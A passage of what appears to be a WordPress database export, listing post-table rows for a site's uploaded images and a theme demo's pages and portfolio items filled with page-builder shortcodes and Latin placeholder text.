alignment_one_column=\"\"][qodef_elements_holder_item item_padding=\"100px 3% 101px 3%\" item_padding_1024_1280=\"100px 3% 101px 0%\" item_padding_1280_1600=\"100px 3% 101px 3%\" item_padding_680=\"100px 3% 60px 3%\" item_padding_680_768=\"100px 0% 101px 0%\" item_padding_768_1024=\"100px 3% 101px 0%\"][qodef_video_button video_link=\"https://vimeo.com/109163564\" video_image=\"754\" play_button_size=\"20px\"][/qodef_elements_holder_item][qodef_elements_holder_item item_padding=\"100px 3% 101px 3%\" item_padding_1024_1280=\"130px 0% 131px 3%\" item_padding_1280_1600=\"130px 3% 131px 3%\" item_padding_680=\"0px 3% 131px 3%\" item_padding_680_768=\"15px 0% 131px 0%\" item_padding_768_1024=\"130px 0% 131px 3%\"][qodef_video_button video_link=\"https://vimeo.com/28781336\" video_image=\"246\" play_button_size=\"20px\"][/qodef_elements_holder_item][/qodef_elements_holder][/vc_column][/vc_row]','Video Button','','publish','closed','closed','','video-button','','','2018-02-12 15:32:14','2018-02-12 15:32:14','',1336,'http://succulents.select-themes.com/?page_id=2716',0,'page','',0),(2742,1,'2020-04-12 11:55:08','2020-04-12 11:55:08','','Logo-footer-smaller-350-x-1-1','','inherit','open','closed','','logo-footer-smaller-350-x-1-1','','','2020-04-12 11:55:13','2020-04-12 11:55:13','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/Logo-footer-smaller-350-x-1-1.png',0,'attachment','image/png',0),(2745,1,'2020-04-09 11:37:23','2020-04-09 11:37:23','','Logo-New-TR-web','','inherit','open','closed','','logo-new-tr-web-2','','','2020-04-09 11:37:30','2020-04-09 11:37:30','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/Logo-New-TR-web.jpg',0,'attachment','image/jpeg',0),(2746,1,'2020-04-07 12:18:16','2020-04-07 12:18:16','','logo-divided-sticky-img-1','','inherit','open','closed','','logo-divided-sticky-img-1','','','2020-04-07 12:18:29','2020-04-07 12:18:29','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/logo-divided-sticky-img-1.png',0,'attachment','image/png',0),(2747,1,'2018-02-13 13:08:30','2018-02-13 13:08:30','','team-member-1','','inherit','open','closed','','team-member-1','','','2018-02-13 13:08:30','2018-02-13 13:08:30','',0,'http://tummyrevolution.com/wp-content/uploads/2018/01/team-member-1.jpg',0,'attachment','image/jpeg',0),(2748,1,'2018-02-13 13:22:02','2018-02-13 13:22:02','','team-member-2','','inherit','open','closed','','team-member-2','','','2018-02-13 13:22:02','2018-02-13 13:22:02','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/team-member-2.jpg',0,'attachment','image/jpeg',0),(2749,1,'2018-02-13 13:22:24','2018-02-13 13:22:24','','team-member-3','','inherit','open','closed','','team-member-3','','','2018-02-13 13:22:24','2018-02-13 13:22:24','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/team-member-3.jpg',0,'attachment','image/jpeg',0),(2753,1,'2018-02-13 13:40:52','2018-02-13 13:40:52','','h1-img10','','inherit','open','closed','','h1-img10','','','2018-02-13 13:40:52','2018-02-13 13:40:52','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/h1-img10.jpg',0,'attachment','image/jpeg',0),(2756,1,'2018-02-13 15:00:02','2018-02-13 15:00:02','','h4-gallery-img-1','','inherit','open','closed','','h4-gallery-img-1','','','2018-02-13 15:00:02','2018-02-13 15:00:02','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/h4-gallery-img-1.jpg',0,'attachment','image/jpeg',0),(2757,1,'2018-02-13 15:00:56','2018-02-13 15:00:56','','h4-gallery-img-2','','inherit','open','closed','','h4-gallery-img-2','','','2018-02-13 15:00:56','2018-02-13 15:00:56','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/h4-gallery-img-2.jpg',0,'attachment','image/jpeg',0),(2760,1,'2018-02-13 15:03:00','2018-02-13 15:03:00','','h4-gallery-img-3','','inherit','open','closed','','h4-gallery-img-3','','','2018-02-13 15:03:00','2018-02-13 15:03:00','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/h4-gallery-img-3.jpg',0,'attachment','image/jpeg',0),(2763,1,'2020-04-12 11:47:26','2020-04-12 11:47:26','','Logo-New-TR-web','','inherit','open','closed','','logo-new-tr-web-4','','','2020-04-12 11:47:33','2020-04-12 11:47:33','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/Logo-New-TR-web.png',0,'attachment','image/png',0),(2769,1,'2020-04-06 13:52:13','2020-04-06 13:52:13','','small-round-logo-for-new-web','','inherit','open','closed','','small-round-logo-for-new-web','','','2020-04-06 13:53:36','2020-04-06 13:53:36','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/small-round-logo-for-new-web.png',0,'attachment','image/png',0),(2773,1,'2018-02-14 11:37:19','2018-02-14 11:37:19','','slika1','','inherit','open','closed','','slika1','','','2018-02-14 11:37:19','2018-02-14 11:37:19','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/slika1.jpg',0,'attachment','image/jpeg',0),(2774,1,'2018-02-14 11:37:43','2018-02-14 11:37:43','','slika2','','inherit','open','closed','','slika2','','','2018-02-14 11:37:43','2018-02-14 11:37:43','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/slika2.jpg',0,'attachment','image/jpeg',0),(2775,1,'2018-02-14 11:38:13','2018-02-14 11:38:13','','slika3','','inherit','open','closed','','slika3','','','2018-02-14 11:38:13','2018-02-14 11:38:13','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/slika3.jpg',0,'attachment','image/jpeg',0),(2786,1,'2018-02-14 12:24:21','2018-02-14 12:24:21','','slika4','','inherit','open','closed','','slika4','','','2018-02-14 12:24:21','2018-02-14 12:24:21','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/slika4.jpg',0,'attachment','image/jpeg',0),(2787,1,'2018-02-14 12:25:12','2018-02-14 12:25:12','','slika5','','inherit','open','closed','','slika5','','','2018-02-14 12:25:12','2018-02-14 12:25:12','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/slika5.jpg',0,'attachment','image/jpeg',0),(2788,1,'2018-02-14 12:25:43','2018-02-14 12:25:43','','slika6','','inherit','open','closed','','slika6','','','2018-02-14 12:25:43','2018-02-14 12:25:43','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/slika6.jpg',0,'attachment','image/jpeg',0),(2789,1,'2018-02-14 12:26:19','2018-02-14 12:26:19','','slika7','','inherit','open','closed','','slika7','','','2018-02-14 12:26:19','2018-02-14 12:26:19','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/slika7.jpg',0,'attachment','image/jpeg',0),(2790,1,'2018-02-14 12:26:51','2018-02-14 12:26:51','','slika8','','inherit','open','closed','','slika8','','','2018-02-14 12:26:51','2018-02-14 12:26:51','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/slika8.jpg',0,'attachment','image/jpeg',0),(2791,1,'2018-02-14 12:27:20','2018-02-14 12:27:20','','slika9','','inherit','open','closed','','slika9','','','2018-02-14 12:27:20','2018-02-14 12:27:20','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/slika9.jpg',0,'attachment','image/jpeg',0),(2792,1,'2018-02-14 12:28:04','2018-02-14 12:28:04','','slika10','','inherit','open','closed','','slika10','','','2018-02-14 12:28:04','2018-02-14 12:28:04','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/slika10.jpg',0,'attachment','image/jpeg',0),(2793,1,'2018-02-14 12:28:37','2018-02-14 12:28:37','','slika11','','inherit','open','closed','','slika11','','','2018-02-14 12:28:37','2018-02-14 12:28:37','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/slika11.jpg',0,'attachment','image/jpeg',0),(2794,1,'2018-02-14 12:29:26','2018-02-14 12:29:26','','slika12','','inherit','open','closed','','slika12','','','2018-02-14 12:29:26','2018-02-14 12:29:26','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/slika12.jpg',0,'attachment','image/jpeg',0),(2795,1,'2018-02-14 12:30:01','2018-02-14 12:30:01','','slika13','','inherit','open','closed','','slika13','','','2018-02-14 12:30:01','2018-02-14 12:30:01','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/slika13.jpg',0,'attachment','image/jpeg',0),(2796,1,'2018-02-14 12:30:43','2018-02-14 12:30:43','','slika14','','inherit','open','closed','','slika14','','','2018-02-14 12:30:43','2018-02-14 12:30:43','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/slika14.jpg',0,'attachment','image/jpeg',0),(2797,1,'2018-02-14 12:31:13','2018-02-14 12:31:13','','slika15','','inherit','open','closed','','slika15','','','2018-02-14 12:31:13','2018-02-14 12:31:13','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/slika15.jpg',0,'attachment','image/jpeg',0),(2798,1,'2018-02-14 12:31:44','2018-02-14 12:31:44','','slika16','','inherit','open','closed','','slika16','','','2018-02-14 12:31:44','2018-02-14 12:31:44','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/slika16.jpg',0,'attachment','image/jpeg',0),(2830,1,'2020-04-12 11:54:04','2020-04-12 11:54:04','','Logo-footer-smaller-350-x-','','inherit','open','closed','','logo-footer-smaller-350-x','','','2020-04-12 11:54:09','2020-04-12 11:54:09','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/Logo-footer-smaller-350-x-.png',0,'attachment','image/png',0),(2833,1,'2018-02-19 08:48:56','2018-02-19 08:48:56','','breadcrumb','','inherit','open','closed','','breadcrumb','','','2018-02-19 08:48:56','2018-02-19 08:48:56','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/breadcrumb.jpg',0,'attachment','image/jpeg',0),(2896,1,'2018-02-19 14:50:28','2018-02-19 14:50:28','','h8-img-10','','inherit','open','closed','','h8-img-10-2','','','2018-02-19 14:50:28','2018-02-19 14:50:28','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/h8-img-10.png',0,'attachment','image/png',0),(2935,1,'2018-02-19 15:34:54','2018-02-19 15:34:54','','h5-tabs-img-1','','inherit','open','closed','','h5-tabs-img-1','','','2018-02-19 15:34:54','2018-02-19 15:34:54','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/h5-tabs-img-1.png',0,'attachment','image/png',0),(2942,1,'2018-02-19 16:17:15','2018-02-19 16:17:15','','h10-slide3-graphic2','','inherit','open','closed','','h10-slide3-graphic2','','','2018-02-19 16:17:15','2018-02-19 16:17:15','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/h10-slide3-graphic2.jpg',0,'attachment','image/jpeg',0),(2964,1,'2018-02-20 10:58:33','2018-02-20 10:58:33','','about-us-img-1','','inherit','open','closed','','about-us-img-1-2','','','2018-02-20 10:58:33','2018-02-20 10:58:33','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/about-us-img-1.jpg',0,'attachment','image/jpeg',0),(2975,1,'2018-02-20 11:10:45','2018-02-20 11:10:45','','our-team-parallax-1','','inherit','open','closed','','our-team-parallax-1','','','2018-02-20 11:10:45','2018-02-20 11:10:45','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/our-team-parallax-1.jpg',0,'attachment','image/jpeg',0),(2981,1,'2018-02-20 11:23:13','2018-02-20 11:23:13','','contact-us-parallax-1','','inherit','open','closed','','contact-us-parallax-1','','','2018-02-20 11:23:13','2018-02-20 11:23:13','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/contact-us-parallax-1.jpg',0,'attachment','image/jpeg',0),(2988,1,'2018-02-20 11:46:51','2018-02-20 11:46:51','','pricing-packages-parallax-1','','inherit','open','closed','','pricing-packages-parallax-1','','','2018-02-20 11:46:51','2018-02-20 11:46:51','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/pricing-packages-parallax-1.jpg',0,'attachment','image/jpeg',0),(2992,1,'2018-02-20 11:54:32','2018-02-20 11:54:32','','what-we-do-img-parallax-1','','inherit','open','closed','','what-we-do-img-parallax-1','','','2018-02-20 11:54:32','2018-02-20 11:54:32','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/what-we-do-img-parallax-1.jpg',0,'attachment','image/jpeg',0),(3007,1,'2018-02-20 14:18:43','2018-02-20 14:18:43','','footer-lazni','','inherit','open','closed','','footer-lazni','','','2018-02-20 14:18:43','2018-02-20 14:18:43','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/footer-lazni.png',0,'attachment','image/png',0),(3061,1,'2020-04-10 13:21:25','2020-04-10 13:21:25','','me-small-square-with-hello','','inherit','open','closed','','me-small-square-with-hello','','','2020-04-10 13:21:39','2020-04-10 13:21:39','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/me-small-square-with-hello.jpg',0,'attachment','image/jpeg',0),(3112,1,'2018-02-21 11:12:06','2018-02-21 11:12:06','','h5-img-8','','inherit','open','closed','','h5-img-8','','','2018-02-21 11:12:06','2018-02-21 11:12:06','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/h5-img-8.jpg',0,'attachment','image/jpeg',0),(3113,1,'2018-02-21 11:12:08','2018-02-21 11:12:08','','h5-img-9','','inherit','open','closed','','h5-img-9','','','2018-02-21 11:12:08','2018-02-21 11:12:08','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/h5-img-9.jpg',0,'attachment','image/jpeg',0),(3115,1,'2018-02-21 11:12:11','2018-02-21 11:12:11','','h5-img-11','','inherit','open','closed','','h5-img-11','','','2018-02-21 11:12:11','2018-02-21 11:12:11','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/h5-img-11.jpg',0,'attachment','image/jpeg',0),(3116,1,'2018-02-21 11:12:13','2018-02-21 11:12:13','','h5-img-12','','inherit','open','closed','','h5-img-12','','','2018-02-21 11:12:13','2018-02-21 11:12:13','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/h5-img-12.jpg',0,'attachment','image/jpeg',0),(3186,1,'2018-02-22 07:43:46','2018-02-22 07:43:46','','h2-img-17','','inherit','open','closed','','h2-img-17','','','2018-02-22 07:43:46','2018-02-22 07:43:46','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/h2-img-17.png',0,'attachment','image/png',0),(3187,1,'2018-02-22 07:43:47','2018-02-22 07:43:47','','h2-img-18','','inherit','open','closed','','h2-img-18','','','2018-02-22 07:43:47','2018-02-22 07:43:47','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/h2-img-18.png',0,'attachment','image/png',0),(3188,1,'2018-02-22 07:43:48','2018-02-22 07:43:48','','h2-img-19','','inherit','open','closed','','h2-img-19','','','2018-02-22 07:43:48','2018-02-22 07:43:48','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/h2-img-19.png',0,'attachment','image/png',0),(3189,1,'2018-02-22 07:43:50','2018-02-22 07:43:50','','h2-img-20','','inherit','open','closed','','h2-img-20','','','2018-02-22 07:43:50','2018-02-22 07:43:50','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/h2-img-20.png',0,'attachment','image/png',0),(3211,1,'2018-02-22 08:40:30','2018-02-22 08:40:30','[vc_row][vc_column][vc_column_text]Est ut aliquam laboramus, usu ignota appareat salutandi te, nam vidit impedit ne. Vide placerat an usu. In detraxit torquatos est. Sea ad mazim prompta facilisis, his id agam dignissim omittantur, natum mutat munere mel et. Inermis feugait salutandi nam ad, iriure voluptua pericula vel ne, ne habeo dictas sit.[/vc_column_text][/vc_column][/vc_row]','Spa','','publish','open','closed','','spa','','','2018-02-22 08:40:30','2018-02-22 08:40:30','',0,'http://succulents.select-themes.com/?post_type=portfolio-item&p=3211',0,'portfolio-item','',0),(3212,1,'2018-02-22 08:40:38','2018-02-22 08:40:38','[vc_row][vc_column][vc_column_text]Est ut aliquam laboramus, usu ignota appareat salutandi te, nam vidit impedit ne. Vide placerat an usu. In detraxit torquatos est. Sea ad mazim prompta facilisis, his id agam dignissim omittantur, natum mutat munere mel et. Inermis feugait salutandi nam ad, iriure voluptua pericula vel ne, ne habeo dictas sit.[/vc_column_text][/vc_column][/vc_row]','Softy','','publish','open','closed','','softy','','','2018-02-22 08:40:38','2018-02-22 08:40:38','',0,'http://succulents.select-themes.com/?post_type=portfolio-item&p=3212',0,'portfolio-item','',0),(3213,1,'2018-02-22 08:40:44','2018-02-22 08:40:44','[vc_row][vc_column][vc_column_text]Est ut aliquam laboramus, usu ignota appareat salutandi te, nam vidit impedit ne. Vide placerat an usu. In detraxit torquatos est. Sea ad mazim prompta facilisis, his id agam dignissim omittantur, natum mutat munere mel et. Inermis feugait salutandi nam ad, iriure voluptua pericula vel ne, ne habeo dictas sit.[/vc_column_text][/vc_column][/vc_row]','Massage','','publish','open','closed','','massage','','','2018-02-22 08:40:44','2018-02-22 08:40:44','',0,'http://succulents.select-themes.com/?post_type=portfolio-item&p=3213',0,'portfolio-item','',0),(3214,1,'2018-02-22 08:40:56','2018-02-22 08:40:56','[vc_row][vc_column][vc_column_text]Est ut aliquam laboramus, usu ignota appareat salutandi te, nam vidit impedit ne. Vide placerat an usu. In detraxit torquatos est. Sea ad mazim prompta facilisis, his id agam dignissim omittantur, natum mutat munere mel et. Inermis feugait salutandi nam ad, iriure voluptua pericula vel ne, ne habeo dictas sit.[/vc_column_text][/vc_column][/vc_row]','Spirit','','publish','open','closed','','spirit','','','2018-02-22 08:40:56','2018-02-22 08:40:56','',0,'http://succulents.select-themes.com/?post_type=portfolio-item&p=3214',0,'portfolio-item','',0),(3215,1,'2018-02-22 08:41:02','2018-02-22 08:41:02','[vc_row][vc_column][vc_column_text]Est ut aliquam laboramus, usu ignota appareat salutandi te, nam vidit impedit ne. Vide placerat an usu. In detraxit torquatos est. Sea ad mazim prompta facilisis, his id agam dignissim omittantur, natum mutat munere mel et. Inermis feugait salutandi nam ad, iriure voluptua pericula vel ne, ne habeo dictas sit.[/vc_column_text][/vc_column][/vc_row]','Salt','','publish','open','closed','','salt','','','2018-02-22 08:41:02','2018-02-22 08:41:02','',0,'http://succulents.select-themes.com/?post_type=portfolio-item&p=3215',0,'portfolio-item','',0),(3216,1,'2018-02-22 08:41:07','2018-02-22 08:41:07','[vc_row][vc_column][vc_column_text]Est ut aliquam laboramus, usu ignota appareat salutandi te, nam vidit impedit ne. Vide placerat an usu. In detraxit torquatos est. Sea ad mazim prompta facilisis, his id agam dignissim omittantur, natum mutat munere mel et. Inermis feugait salutandi nam ad, iriure voluptua pericula vel ne, ne habeo dictas sit.[/vc_column_text][/vc_column][/vc_row]','Bath','','publish','open','closed','','bath','','','2018-02-22 08:41:07','2018-02-22 08:41:07','',0,'http://succulents.select-themes.com/?post_type=portfolio-item&p=3216',0,'portfolio-item','',0),(3217,1,'2018-02-22 08:41:14','2018-02-22 08:41:14','[vc_row][vc_column][vc_column_text]Est ut aliquam laboramus, usu ignota appareat salutandi te, nam vidit impedit ne. Vide placerat an usu. In detraxit torquatos est. Sea ad mazim prompta facilisis, his id agam dignissim omittantur, natum mutat munere mel et. Inermis feugait salutandi nam ad, iriure voluptua pericula vel ne, ne habeo dictas sit.[/vc_column_text][/vc_column][/vc_row]','Relax','','publish','open','closed','','relax','','','2018-02-22 08:41:14','2018-02-22 08:41:14','',0,'http://succulents.select-themes.com/?post_type=portfolio-item&p=3217',0,'portfolio-item','',0),(3218,1,'2018-02-22 08:41:20','2018-02-22 08:41:20','[vc_row][vc_column][vc_column_text]Est ut aliquam laboramus, usu ignota appareat salutandi te, nam vidit impedit ne. Vide placerat an usu. In detraxit torquatos est. Sea ad mazim prompta facilisis, his id agam dignissim omi.[/vc_column_text][/vc_column][/vc_row]','Orchid','','publish','open','closed','','orchid','','','2018-02-22 08:41:20','2018-02-22 08:41:20','',0,'http://succulents.select-themes.com/?post_type=portfolio-item&p=3218',0,'portfolio-item','',0),(3222,1,'2018-02-22 08:52:38','2018-02-22 08:52:38','','h3-slide1-graphic1','','inherit','open','closed','','h3-slide1-graphic1','','','2018-02-22 08:52:38','2018-02-22 08:52:38','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/h3-slide1-graphic1.png',0,'attachment','image/png',0),(3223,1,'2018-02-22 08:54:11','2018-02-22 08:54:11','','h3-slide1-graphic7','','inherit','open','closed','','h3-slide1-graphic7','','','2018-02-22 08:54:11','2018-02-22 08:54:11','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/h3-slide1-graphic7.png',0,'attachment','image/png',0),(3224,1,'2018-02-22 08:55:52','2018-02-22 08:55:52','','h3-slide1-graphic6','','inherit','open','closed','','h3-slide1-graphic6','','','2018-02-22 08:55:52','2018-02-22 08:55:52','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/h3-slide1-graphic6.png',0,'attachment','image/png',0),(3227,1,'2018-02-22 08:59:43','2018-02-22 08:59:43','','h3-slide1-graphic8','','inherit','open','closed','','h3-slide1-graphic8','','','2018-02-22 08:59:43','2018-02-22 08:59:43','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/h3-slide1-graphic8.png',0,'attachment','image/png',0),(3229,1,'2018-02-22 09:01:32','2018-02-22 09:01:32','','h3-slide1-graphic2','','inherit','open','closed','','h3-slide1-graphic2','','','2018-02-22 09:01:32','2018-02-22 09:01:32','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/h3-slide1-graphic2.png',0,'attachment','image/png',0),(3231,1,'2018-02-22 09:14:31','2018-02-22 09:14:31','','h3-slide1-graphic4 (1)','','inherit','open','closed','','h3-slide1-graphic4-1','','','2018-02-22 09:14:31','2018-02-22 09:14:31','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/h3-slide1-graphic4-1.png',0,'attachment','image/png',0),(3232,1,'2018-02-22 09:19:27','2018-02-22 09:19:27','','h3-slide1-graphic12','','inherit','open','closed','','h3-slide1-graphic12','','','2018-02-22 09:19:27','2018-02-22 09:19:27','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/h3-slide1-graphic12.png',0,'attachment','image/png',0),(3234,1,'2018-02-22 09:31:29','2018-02-22 09:31:29','','h3-slide1-graphic2','','inherit','open','closed','','h3-slide1-graphic2-2','','','2018-02-22 09:31:29','2018-02-22 09:31:29','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/h3-slide1-graphic2-1.png',0,'attachment','image/png',0),(3235,1,'2018-02-22 09:34:23','2018-02-22 09:34:23','','h3-slide1-graphic5','','inherit','open','closed','','h3-slide1-graphic5','','','2018-02-22 09:34:23','2018-02-22 09:34:23','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/h3-slide1-graphic5.png',0,'attachment','image/png',0),(3236,1,'2018-02-22 09:38:21','2018-02-22 09:38:21','','h3-slide1-graphic-brush','','inherit','open','closed','','h3-slide1-graphic-brush','','','2018-02-22 09:38:21','2018-02-22 09:38:21','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/h3-slide1-graphic-brush.png',0,'attachment','image/png',0),(3238,1,'2018-02-22 10:00:41','2018-02-22 10:00:41','','h3-slide1-graphic3','','inherit','open','closed','','h3-slide1-graphic3','','','2018-02-22 10:00:41','2018-02-22 10:00:41','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/h3-slide1-graphic3.png',0,'attachment','image/png',0),(3261,1,'2018-02-22 12:02:00','2018-02-22 12:02:00','','h3-slide2-graphic1','','inherit','open','closed','','h3-slide2-graphic1-2','','','2018-02-22 12:02:00','2018-02-22 12:02:00','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/h3-slide2-graphic1-1.png',0,'attachment','image/png',0),(3262,1,'2018-02-22 12:18:06','2018-02-22 12:18:06','','h3-slide2-graphic5','','inherit','open','closed','','h3-slide2-graphic5-2','','','2018-02-22 12:18:06','2018-02-22 12:18:06','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/h3-slide2-graphic5-1.png',0,'attachment','image/png',0),(3263,1,'2018-02-22 12:22:38','2018-02-22 12:22:38','','h3-slide2-graphic4','','inherit','open','closed','','h3-slide2-graphic4','','','2018-02-22 12:22:38','2018-02-22 12:22:38','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/h3-slide2-graphic4.png',0,'attachment','image/png',0),(3264,1,'2018-02-22 12:23:48','2018-02-22 12:23:48','','h3-slide2-graphic6','','inherit','open','closed','','h3-slide2-graphic6-2','','','2018-02-22 12:23:48','2018-02-22 12:23:48','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/h3-slide2-graphic6-1.png',0,'attachment','image/png',0),(3265,1,'2018-02-22 12:25:04','2018-02-22 12:25:04','','h3-slide2-graphic3','','inherit','open','closed','','h3-slide2-graphic3-2','','','2018-02-22 12:25:04','2018-02-22 12:25:04','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/h3-slide2-graphic3-1.png',0,'attachment','image/png',0),(3266,1,'2018-02-22 12:26:15','2018-02-22 12:26:15','','h3-slide2-graphic2','','inherit','open','closed','','h3-slide2-graphic2-2','','','2018-02-22 12:26:15','2018-02-22 12:26:15','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/h3-slide2-graphic2-1.png',0,'attachment','image/png',0),(3274,1,'2018-02-22 13:52:09','2018-02-22 13:52:09','','pricing-img-8','','inherit','open','closed','','pricing-img-8','','','2018-02-22 13:52:09','2018-02-22 13:52:09','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/pricing-img-8.png',0,'attachment','image/png',0),(3275,1,'2018-02-22 13:52:14','2018-02-22 13:52:14','','h3-slide3-graphic1','','inherit','open','closed','','h3-slide3-graphic1-2','','','2018-02-22 13:52:14','2018-02-22 13:52:14','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/h3-slide3-graphic1.jpg',0,'attachment','image/jpeg',0),(3276,1,'2018-02-22 13:52:38','2018-02-22 13:52:38','','pricing-img-9','','inherit','open','closed','','pricing-img-9','','','2018-02-22 13:52:38','2018-02-22 13:52:38','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/pricing-img-9-1.png',0,'attachment','image/png',0),(3278,1,'2018-02-22 13:57:12','2018-02-22 13:57:12','','h3-slide3-graphic-3','','inherit','open','closed','','h3-slide3-graphic-3','','','2018-02-22 13:57:12','2018-02-22 13:57:12','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/h3-slide3-graphic-3.png',0,'attachment','image/png',0),(3279,1,'2018-02-22 13:59:08','2018-02-22 13:59:08','','h3-slide3-graphic-4','','inherit','open','closed','','h3-slide3-graphic-4','','','2018-02-22 13:59:08','2018-02-22 13:59:08','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/h3-slide3-graphic-4-1.png',0,'attachment','image/png',0),(3280,1,'2018-02-22 14:01:09','2018-02-22 14:01:09','','h3-slide3-graphic2','','inherit','open','closed','','h3-slide3-graphic2-2','','','2018-02-22 14:01:09','2018-02-22 14:01:09','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/h3-slide3-graphic2-1.png',0,'attachment','image/png',0),(3295,1,'2018-02-22 15:07:07','2018-02-22 15:07:07','','pricing-img-4','','inherit','open','closed','','pricing-img-4-2','','','2018-02-22 15:07:07','2018-02-22 15:07:07','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/pricing-img-4.jpg',0,'attachment','image/jpeg',0),(3309,1,'2018-02-22 15:36:10','2018-02-22 15:36:10','','h4-slide1-graphic7','','inherit','open','closed','','h4-slide1-graphic7','','','2018-02-22 15:36:10','2018-02-22 15:36:10','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/h4-slide1-graphic7.png',0,'attachment','image/png',0),(3310,1,'2018-02-22 15:38:34','2018-02-22 15:38:34','','h4-slide1-graphic7','','inherit','open','closed','','h4-slide1-graphic7-2','','','2018-02-22 15:38:34','2018-02-22 15:38:34','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/h4-slide1-graphic7-1.png',0,'attachment','image/png',0),(3311,1,'2018-02-22 15:40:23','2018-02-22 15:40:23','','h4-slide1-graphic6','','inherit','open','closed','','h4-slide1-graphic6','','','2018-02-22 15:40:23','2018-02-22 15:40:23','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/h4-slide1-graphic6.png',0,'attachment','image/png',0),(3312,1,'2018-02-22 15:46:54','2018-02-22 15:46:54','','h4-slide1-graphic2','','inherit','open','closed','','h4-slide1-graphic2','','','2018-02-22 15:46:54','2018-02-22 15:46:54','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/h4-slide1-graphic2.png',0,'attachment','image/png',0),(3313,1,'2018-02-22 15:48:08','2018-02-22 15:48:08','','h4-slide1-graphic3','','inherit','open','closed','','h4-slide1-graphic3','','','2018-02-22 15:48:08','2018-02-22 15:48:08','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/h4-slide1-graphic3.png',0,'attachment','image/png',0),(3314,1,'2018-02-22 15:49:30','2018-02-22 15:49:30','','h4-slide1-graphic1','','inherit','open','closed','','h4-slide1-graphic1','','','2018-02-22 15:49:30','2018-02-22 15:49:30','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/h4-slide1-graphic1.png',0,'attachment','image/png',0),(3315,1,'2018-02-22 15:50:28','2018-02-22 15:50:28','','h4-slide1-graphic4','','inherit','open','closed','','h4-slide1-graphic4','','','2018-02-22 15:50:28','2018-02-22 15:50:28','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/h4-slide1-graphic4.png',0,'attachment','image/png',0),(3316,1,'2018-02-22 15:51:36','2018-02-22 15:51:36','','h4-slide1-graphic5','','inherit','open','closed','','h4-slide1-graphic5','','','2018-02-22 15:51:36','2018-02-22 15:51:36','',0,'http://tummyrevolution.com/wp-content/uploads/2018/02/h4-slide1-graphic5.png',0,'attachment','image/png',0),(3346,1,'2018-02-23 09:54:34','2018-02-23 09:54:34','','h9-img-12','','inherit','open','closed','','h9-img-12-2','','','2018-02-23 09:54:34','2018-02-23 